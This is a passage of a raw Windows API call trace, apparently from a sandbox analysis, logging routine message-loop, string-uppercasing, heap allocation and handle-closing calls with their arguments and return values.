lpMsg=0x8bf4b0) returned 0 [0199.269] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.269] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0199.269] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.269] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0199.269] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.269] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.269] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.269] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.269] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0199.269] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0199.270] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0199.270] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0199.270] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0199.270] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.270] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.270] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.270] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.270] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.270] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.270] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0199.270] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.270] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0199.270] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.270] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.270] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.271] CryptReleaseContext (hProv=0xad6480, dwFlags=0x0) returned 1 [0199.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0199.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0199.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0199.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0199.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0199.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0199.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0199.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0199.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0199.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0199.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0199.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0199.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0199.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0199.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0199.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0199.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0199.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0199.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0199.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0199.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0199.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0199.272] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.272] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0199.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0199.273] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.273] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0199.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0199.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0199.273] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0199.273] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0199.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0199.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0199.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0199.274] FreeLibrary (hLibModule=0x74d40000) returned 1 [0199.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0199.274] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0199.274] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0199.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0199.274] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0199.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0199.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0199.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0199.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0199.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0199.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0199.275] CloseHandle (hObject=0x294) returned 1 [0199.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0199.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0199.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0199.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0199.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0199.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0199.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0199.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0199.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0199.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0199.276] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 1 [0199.276] TranslateMessage (lpMsg=0x8bf710) returned 0 [0199.276] DispatchMessageW (lpMsg=0x8bf710) returned 0x0 [0199.276] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0199.276] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0199.276] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0199.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0199.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0199.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0199.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0199.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0199.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0199.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0199.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0199.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0199.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0199.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0199.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0199.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0199.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c48 [0199.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa080 [0199.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0199.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa188 [0199.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0199.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0199.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa860 [0199.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0199.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0199.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.278] CloseHandle (hObject=0x268) returned 1 [0199.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0199.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0199.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0199.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0199.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0199.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0199.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0199.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0199.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0199.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0199.285] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0199.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0199.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0199.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0199.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0199.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0199.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0199.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0199.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0199.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0199.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0199.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0199.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0199.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0199.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0199.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0199.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0199.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0199.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0199.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0199.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0199.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0199.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0199.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0199.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0199.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0199.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0199.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0199.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0199.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0199.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0199.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0199.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0199.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0199.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0199.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0199.288] 